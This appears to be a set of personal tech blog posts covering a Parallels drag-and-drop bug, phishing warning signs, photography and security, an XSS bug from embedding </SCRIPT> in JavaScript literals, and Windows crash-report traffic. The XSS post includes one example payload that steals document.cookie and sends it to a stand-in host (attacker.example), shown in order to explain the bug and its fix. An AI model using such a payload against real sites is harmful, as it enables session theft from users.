Drag’n’Drop Problems with Parallels 4

Since installing Snow Leopard, I can no longer Drag’n’Drop files from Windows to the hosting OS X environment, though the inverse works just fine. Is anyone else having this problem? I’m not seeing much about it on the Parallels forums, but I think the bug is real.

To say that I’m distrusting of Microsoft Windows’ security is putting things lightly. So when Microsoft’s anti-open standards make Windows a necessity, I tend to use a virtual machine to sandbox its activities.

On Mac OS X, I use a wonderful product called Parallels, which has the added bonus of being able to drag’n’drop files and directories between the guest operating system (Windows) and the host operating system (OS X).

After installing the latest Snow Leopard (10.6), I found that while I could drag files into Windows from OS X, the reverse was no longer true. Dragging something from the Windows desktop out to the OS X desktop, which used to work in Leopard (10.5), simply results in nothing happening.

Parallels 4.x Shared Services Drag'n'Drop

Now, I’m aware that Apple made some pretty big changes under the hood in Snow Leopard. I’m aware that even the Finder got a fairly intensive overhaul. And I’m even willing to accept that there might be bumps during the transition process as the good folks at Parallels update their product to address little tidbits like this.

However, I’m kinda surprised that this kind of thing snuck past testing. Even more surprising is that I don’t hear many people talking about it. That led me to think that perhaps I have a local configuration issue.

But then I heard from another Parallels user who updated to Snow Leopard. He ran into the same problem: Drag’n’Drop now worked in only one direction.

Most of the Snow Leopard fuss currently centers on the fact that Parallels 2.x and 3.x no longer work under Snow Leopard. Parallels made such a good and stable product that early users saw no need to upgrade, as it met their needs. However, Apple’s approach to operating systems is far more progressive than Microsoft’s: Apple is willing to sacrifice backwards compatibility in software and hardware when the technology is substantially old and the new benefits far outweigh the trouble. Thus Apple tends to fix problems rather than band-aiding workarounds over them; in the long haul everyone benefits with faster, smaller, more capable applications instead of bloatware.

However, I’m riding the Parallels 4.x wave on the bleeding edge. I’ve got the Parallels Tools installed. I’ve got the Enable Drag’n’Drop checked in the Shared Services config. Still, nothing.

I did a little digging around and found one user, Jamie Daniel, who was experiencing the same problem. As his question went unanswered, I tried asking myself.

I wrote an entry in the Parallels forum entitled Drag files from Guest to Host no longer working, detailing the problem.

And, while I was luckier than Jamie and got an answer, it was fairly clear someone gave my post a cursory glance and cut’n’pasted a response without reading what I was asking. In short, I did not want Windows to be able to read or write to any OS X drives. Should Windows get a virus, I didn’t want it having free rein of the OS X filesystem to corrupt. Only I, via Drag’n’Drop, should be able to marshal content between the two environments.

Willing to accept the fact that I may have a configuration problem, despite being a power user of Parallels since day one, I am also willing to accept that this is simply a Snow Leopard compatibility issue that Parallels will soon be addressing. Problem is, I can’t seem to raise the issue to a level where someone can confirm or deny it.

Worse yet, I can’t seem to log in to Windows via the Finder anymore to mount a Windows disk within OS X, whereas I used to be able to do that as well. While workarounds exist (a USB disk, which mounts in both environments; DropBox; or the Windows guest account’s Parallels mount point), I’d really like the old capability back.

So I ask, Parallels 4.x users who are running Snow Leopard: are you no longer able to drag from Windows to the OS X desktop?

If you can, how are you doing it?

If you can’t, please head over to the Parallels forum and let them know it’s broken for you as well. This is not a request to attack Parallels; they’re good people. It’s just to raise awareness, so they know the issue is real and can look into it.

UPDATE 14-Sep-2009: Found a workaround, but I’m not happy about it. What I don’t like is that it appears to expose Windows disks to OS X. While I trust OS X, no such exposure is necessary to perform a Drag’n’Drop from OS X to Windows, so I’d expect Enable Drag-and-Drop to be enough on its own.

If you turn on the Share All Disks with OS X option, then Drag’n’Drop from the Windows desktop to the OS X desktop works.

Parallels 4 Drag'n'Drop Hack

Seven Phishing Warning Signs

Got a very well done phishing email today, but I’m more impressed with Bank of America’s abuse-response letter: they distilled things down to seven simple warning signs that tell you you’re being phished. This is something useful to pass on to the less email-savvy people in your life.

This morning I received an email from “Bank of America” asking me to click on the included link to verify some information that had been changed in my banking details.

Well, given that I was addressed as “Dear Reliable Customer,” and that I don’t have an account with Bank of America, I was pretty sure this was a phishing attack. Viewing the raw form of the message, which exposes the HTML, further confirmed that the email was not from Bank of America, nor was the link for verification destined for Bank of America’s servers.

Normally, I put such stuff in my spam folders, but this one impressed me. It was good. Very good. The email used what looked like an old banner from Bank of America’s site to produce quite an authentic branded email. It did so by pointing an image tag at a real Bank of America server.

As such, I felt it was worth the time to gather all the server information I could and pass it along to Bank of America, with the hopes that either their technicians or lawyers would be able to have a field day with the sender.

Not only did I get a nice reply back from Bank of America, but I have to say they really have their act together!

Check out this simple 7-point list they passed on that concisely helps customers identify when they might be defrauded by a scammer.

Source: Bank of America’s email

The main goal of a phishing email is to get you to a site where you will provide your personal information. With these basic, but powerful, clues, you can easily recognize the threat and ensure the safety of your identity and finances.

1. Does the email ask you to go to a website and verify personal information? We won’t ask you to verify your personal information in response to an email.
2. What is the tone of the mail? Most phish emails convey a sense of urgency by threatening discontinued service or information loss if you don’t take immediate action.
3. What is the quality of the email? Many phish emails have misspellings, bad grammar, or poor punctuation.
4. Are the links in the email valid? Deceptive links in phishing emails look like they are to a valid site, but deliver you to a fraudulent one. Many times you can see if the link is legitimate by just moving your mouse over the link.
5. Is the email personalized with your name and applicable account information? Many phish emails use generic salutations and generic information (e.g. “Dear Customer” or “Dear Account Holder”) instead of your name.
6. What is the sender’s email address? Many phish emails come from an email address not from the company represented in the email.
7. When in doubt, type it out. If you suspect an email to be phishing, don’t click on any links in the email. Type the valid address directly into your web browser.

Wonderful advice. And it applies to more than just banking emails.

Thank you, Bank of America. It’s something simple I can pass along to friends and family.

Photographers a Threat? Uh, no.

Bruce Schneier talks about The War on Photography, where photographers are presumed to be terrorists. This struck a chord with me, as I’m a photographer, and I have been stopped in the manner Bruce describes.

In Bruce Schneier‘s CRYPTO-GRAM, he includes a reprint of a fantastic article entitled The War on Photography.

Excerpt:

Since 9/11, there has been an increasing war on photography. Photographers have been harassed, questioned, detained, arrested or worse, and declared to be unwelcome. We’ve been repeatedly told to watch out for photographers, especially suspicious ones. Clearly any terrorist is going to first photograph his target, so vigilance is required.

Except that it’s nonsense. The 9/11 terrorists didn’t photograph anything. Nor did the London transport bombers, the Madrid subway bombers, or the liquid bombers arrested in 2006. Timothy McVeigh didn’t photograph the Oklahoma City Federal Building. The Unabomber didn’t photograph anything; neither did shoe-bomber…

As a photographer, I have been stopped by security guards, questioned about why I was photographing a building, and probed about who I was working for. Bruce explains why this is not only nonsense, but a waste of resources and money.

The article’s short. Take a moment to read it. It brings common sense back to the equation.

I’m a photographer, and if I take a picture of something, it’s because I like it and want to preserve it for others to enjoy too.

Using </SCRIPT> In A JavaScript Literal

Today I got bit by a very interesting bug involving the </SCRIPT> tag. If you’re writing code that generates code, you want to know about this.

I’m currently working on an application that takes content from various web resources, munges the content, stores it in a database, and on demand generates interactive web pages, which includes the ability to annotate content in a web editor. Things were humming along great for weeks until we got a stream of data which made the browser burp with a JavaScript syntax error.

Problem was, when I examined the automatically generated JavaScript, it looked perfectly good to my eyes.

So, I reduced the problem down to a very trivial case.

What would you suppose the following code block does in a browser?

<HTML>
<BODY>
  start
  <SCRIPT>
    alert( "</SCRIPT>" );
  </SCRIPT>
  finish
</BODY>
</HTML>

Try it and see.

To my eyes, this should produce an alert box with the simple text </SCRIPT> inside it. Nothing special.

However, in all browsers (IE 7, Firefox, Opera, and Safari) on all platforms (XP/Vista/OS X) it didn’t. The close tag inside the quoted literal terminated the scripting block, printing the closing punctuation.

Change </SCRIPT> to just <SCRIPT>, and you get the alert box as expected.

So, I did more reading and more testing. I looked at the hex dump of the file to see if perhaps there was something strange going on. Nope, plain ASCII.

I looked at the JavaScript documentation online, and the only other things it suggests escaping are the single and double quotes, as well as the backslash that does the escaping. (Note we’re using a forward slash, which requires no escaping in a JavaScript string.)

I even got the 5th Edition of JavaScript: The Definitive Guide from O’Reilly, and on page 27, which lists the comprehensive escape sequences, there is nothing magical about the forward slash, nor this magic string.

In fact, if you start playing with other strings, you get these results:
  <SCRIPT> …works
  <A/B> …works
  </STRONG> …works
  <\/SCRIPT> …displays </SCRIPT>, and while I suppose you can escape a forward slash, there should be no need to. Ever. See prior example.
  </SCRIPT> …breaks
  </SCRIPTX> …works (note the extra character, an X)

With JavaScript, what’s in quotes is supposed to be flat, literal, uninterpreted, meaningless text.

It was after this I turned to ask for help from several security and web experts.

Security Concerns


Why security experts?

The primary concern is obviously cross-site scripting. We’re taking untrusted sites and displaying portions of the data stream. Should an attacker be able to insert </SCRIPT> into the stream, follow it with a few comment characters, and shortly reopen a new <SCRIPT> block, he’d be able to mess with cookies, twiddle the DOM, dink with AJAX, and do things that compromise the trust of the server.
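
To make the attack concrete, here’s a hypothetical hostile input; the payload and URL are invented for illustration. If the upstream generator pasted it verbatim into a JavaScript string literal, the HTML parser would close our script block at the first </SCRIPT> and run the attacker’s block as live code:

// Hypothetical hostile input, invented for illustration. Dropped verbatim
// inside alert( "..." ), the first </SCRIPT> ends our script block and the
// attacker's <SCRIPT> block that follows executes on our page.
String hostileInput =
    "</SCRIPT><SCRIPT>new Image().src = 'http://attacker.example/c?'"
    + " + document.cookie;</SCRIPT>";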

The Explanation


The explanation came from Phil Wherry.

As he puts it, the <SCRIPT> tag is content-agnostic, which means the HTML parser doesn’t know we’re in the middle of a JavaScript string.

What the HTML parser saw was this:

<HTML>
<BODY>
  start
  <SCRIPT>alert( "</SCRIPT>
  " );
  </SCRIPT>
  finish
</BODY>
</HTML>

And there you have it, not only is the syntax error obvious now, but the HTML is malformed.

The processing of JavaScript doesn’t happen until after the browser has understood which parts are JavaScript. Until it sees that close </SCRIPT> tag, it doesn’t care what’s inside – quoted or not.

Turns out, we all have seen this problem in traditional programming languages before. Ever run across hard-to-read code where the indentation conveys a block that doesn’t logically exist? Same thing. In this case instead of curly braces or begin/end pairs, it was the start and end tags of the JavaScript.
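
A minimal illustration of that trap in a curly-brace language (the names are made up):

// The indentation implies both calls are guarded by the if,
// but without braces only the first one actually is:
if (deviceReady)
    initialize();
    startTransfer(); // always runs, whatever the indentation suggests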

Upstream Processing


Remember, this wasn’t hand-rolled JavaScript. It was produced by an upstream piece of code that generated the actual JavaScript block, which is much more complex than the example shown.

It is handed an untrusted string which, to be shoved inside a JavaScript string literal, not only has to be sanitized, but also escaped in such a way that the HTML parser cannot accidentally treat the string’s contents as a legal (or illegal!) tag.

To do this we need to build a helper function to scrub data that will directly be emitted as a raw JavaScript string.


  1. Escape all backslashes, replacing \ with \\, since backslash is the JavaScript escape character. This has to be done first so as not to escape the other escapes we’re about to add.
  2. Escape all quotes, replacing ' with \', and " with \" — this stops the string from getting terminated.
  3. Escape all angle brackets, replacing < with \<, and > with \> — this stops the tags from getting recognized.

private String safeJavaScriptStringLiteral(String str) {
  str = str.replace("\\", "\\\\"); // escape backslashes (must be done first)
  str = str.replace("'", "\\'");   // escape single quotes
  str = str.replace("\"", "\\\""); // escape double quotes
  str = str.replace("<", "\\<");   // escape open angle brackets
  str = str.replace(">", "\\>");   // escape close angle brackets
  return str;
}
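
As a quick sanity check, here’s the helper applied to a hypothetical hostile input of my own invention; the comments show the result and why it’s now harmless:

String hostile = "</SCRIPT><SCRIPT>alert(1)</SCRIPT>";
String safe = safeJavaScriptStringLiteral(hostile);
// safe is now: \</SCRIPT\>\<SCRIPT\>alert(1)\</SCRIPT\>
// The HTML parser never finds a complete close tag, because the escaped \>
// breaks it (compare the </SCRIPTX> case above), while JavaScript quietly
// drops the unnecessary backslashes, leaving the original text intact.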

At this point we should have generated a JavaScript string that never contains anything that looks like a tag, and is perfectly safe to an XML parser. All that’s needed next is to emit the JavaScript surrounded by a <![CDATA[ ]]> block, so the HTML parser doesn’t get confused by embedded angle brackets.
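
Putting it together, a minimal sketch of what the emitting side might look like. The method name and PrintWriter are my assumptions, not the actual application’s code, and the leading // keeps the CDATA markers from tripping browsers that treat the block as plain script:

import java.io.PrintWriter;

// Sketch: emit a script block whose only dynamic content is the scrubbed
// string, wrapped in a comment-hidden CDATA section for the XML parser.
void emitScriptBlock(PrintWriter out, String untrusted) {
  out.println("<SCRIPT>");
  out.println("//<![CDATA[");
  out.println("var content = \"" + safeJavaScriptStringLiteral(untrusted) + "\";");
  out.println("//]]>");
  out.println("</SCRIPT>");
}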

From a security perspective, I think this also goes to show that validating a lone JavaScript fragment isn’t enough; one has to take it in the full context of the containing HTML parser. Pragmatically speaking, the JavaScript alone was valid, but once inside HTML it became problematic.

Behind the Blue Screen of Death, Is Microsoft Vulnerable?

XP suffered a Blue Screen of Death due to a very simple cause, but this got the gears going — are phone-home-on-error systems vulnerable and not getting the attention they deserve?

This morning I came in to work and discovered my Windows XP desktop in a crashed state, you know the one, the Blue Screen of Death; the same one you see billboard sized at Times Square.

Given that I’m meticulous about patches and clean registry settings, and run an army of anti-spyware, anti-malware, and anti-virus detectors, not to mention that the machine is used for very limited purposes, it’s very likely this isn’t some bad 3rd party Windows driver. Oh no, the error message squarely put the blame on the USB driver.

Knowing that, I can think back to my very last activities at the end of the day. I saved a file in a simple editor, that file was on my Dell USB stick, and after it saved I initiated a Windows reboot, pulled my USB stick (whose activity light was well extinguished), and walked out the door as Windows was still shutting down.

I’m going to simply conclude that Windows was so “busy” with its shutdown that it didn’t “see” the USB device get removed, and was left in such a horrified state that it had to die (something that does not happen with my Mac, ever). This is further confirmed by the fact that, after a hard power reset, XP came up fine and all of my diagnostic utilities passed. Windows had just, plain and simply, died.

Sometime after booting, however, I got a message that Windows had detected it had shut down in a bad manner, and it wanted to know if it was okay to send the report to Microsoft. I’m all for making things better, but I thought it might be interesting to look into the post-Blue Screen of Death activities.

The Blue Screen of Death did a crash dump and some files were written to disk in a directory called C:\Documents and Settings\{username}\Local Settings\Temp\WEReeed.dir00.

The file manifest.txt consisted of name/value pairs separated by an equal sign, in much the same way as the contents of an .ini file might be done, sans section headers.
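
For illustration, a minimal sketch of reading such a file into name/value pairs, assuming each pair sits on a single line (the method is mine, not Microsoft’s):

import java.io.BufferedReader;
import java.io.FileReader;
import java.io.IOException;
import java.util.LinkedHashMap;
import java.util.Map;

// Sketch: split each Name=Value line of manifest.txt at the first equal
// sign, preserving file order; there are no [section] headers to handle.
Map<String, String> readManifest(String path) throws IOException {
  Map<String, String> pairs = new LinkedHashMap<String, String>();
  BufferedReader in = new BufferedReader(new FileReader(path));
  try {
    String line;
    while ((line = in.readLine()) != null) {
      int eq = line.indexOf('=');
      if (eq > 0) {
        pairs.put(line.substring(0, eq), line.substring(eq + 1));
      }
    }
  } finally {
    in.close();
  }
  return pairs;
}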

The more curious contents of this file revealed the server, a URL with some values, which data files were being sent, and a very obscure reference to what might be a “blue” screen report.

Server=watson.microsoft.com
Stage2URL=/dw/bluetwo.asp?BCCode=1000007e&BCP1=C0000005&
BCP2=BA2C4371&BCP3=BA503AF4&BCP4=BA5037F0&
OSVer=5_1_2600&SP=2_0&Product=256_1
DataFiles=C:\DOCUME~1\{username}\LOCALS~1\Temp\
WEReeed.dir00\Mini022207-01.dmp|C:\DOCUME~1\{username}\
LOCALS~1\Temp\WEReeed.dir00\sysdata.xml
ErrorSubPath=blue

The sysdata.xml file was an XML document that listed every device, its description, hardware id, service, and driver, often with the version and file size as well. Sure enough, the usbhub.sys file was there, buried in the batch. It appears this file tries to collect the configuration of the machine, perhaps to recreate it in the lab for regression testing and a battery of comprehensively abusive test suites. At least that’s what I would hope happens.

The Mini022207-01.dmp file name is clearly the month/day/year-sequence_number of when the dump was made. When the Blue Screen of Death happened, it claimed it was dumping all of physical memory. Given this mini-dump is only 92K, some post-processing has clearly taken place.

In my case, the file was clearly a page dump of a section of memory, with what looked like uninitialized memory labeled with bytes literally reading “PAGE”. Inside this binary blob it was very easy to make out pgfilter.sys, USBSTOR.SYS, and kmixer.sys. Other device driver names and binary glop followed.

Actually submitting the report showed that watson.microsoft.com (as in the product Dr. Watson) was queried and an IP of 65.54.206.43 came back. An https: exchange was made, and moments later oca.partners.extranet.microsoft.com (131.107.112.111) was asked of the DNS server; more content was sent to that server. wwwbaytest5.microsoft.com (207.46.18.30) was then asked for a certificate, via GET /pki/mscorp/Microsoft%20Secure%20Sever%20Authority(3).crt; a few more of these went back and forth, and wer.microsoft.com (131.107.115.67) got involved; that’s when my browser reported the human-readable response to the report. Compounding matters, no tracking number or email address is provided, so even if I wanted to give Microsoft more information to help them fix the problem, I can’t.

After all this happened, another thought struck me: Microsoft doesn’t really have a good track record with security, especially when it comes to error checking and services that aren’t used that much. What would have happened if the information had been tampered with before being sent? Is there invalid input that could send the error-reporting systems into a tizzy? Could some bogus changes make their debugger or tools execute malicious code? Would some false data send a poor analysis team chasing fictional ghosts? What would happen if an automated script kiddie generated millions of bogus machine crash reports; how would they get sorted out?

I ask the question because there are quite a number of phone-home-if-you-see-a-problem systems out there in popular open source projects. It seems to me that there should be solid, secure conventions to detect whether error report data has been tampered with or is bogus, and to prevent the same kinds of attacks regular systems suffer from. This is something worth spending design time on, even if it isn’t part of the main product functionality.
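
As a sketch of one such convention, the client could attach a keyed hash to the serialized report so the collector can detect in-transit tampering. It’s only a sketch: a key embedded in every client can be extracted, so this raises the bar for casual tampering rather than stopping a determined flood of bogus reports, which still needs server-side sanity checks and rate limiting:

import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

// Sketch: HMAC the serialized crash report; the collector recomputes the
// tag and quarantines, rather than parses, anything that doesn't match.
byte[] signReport(byte[] report, byte[] key) throws Exception {
  Mac mac = Mac.getInstance("HmacSHA1");
  mac.init(new SecretKeySpec(key, "HmacSHA1"));
  return mac.doFinal(report);
}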

Update: Suffered another crash, this time in the ATI driver, while the system was doing nothing more than changing focus from one window to another. Oddly enough, again, all the diagnostics say the system is fine; I’m going to do a very intensive sweep.

For the curious, the new directory was WERdb4a.dir00, with similar manifest, dump, and sysdata files. WER is Windows Error Reporting, and the stuff after it appears to be hex glop. This time it’s blaming the video driver, so I’ll be checking whether there are any updates from both Dell and ATI.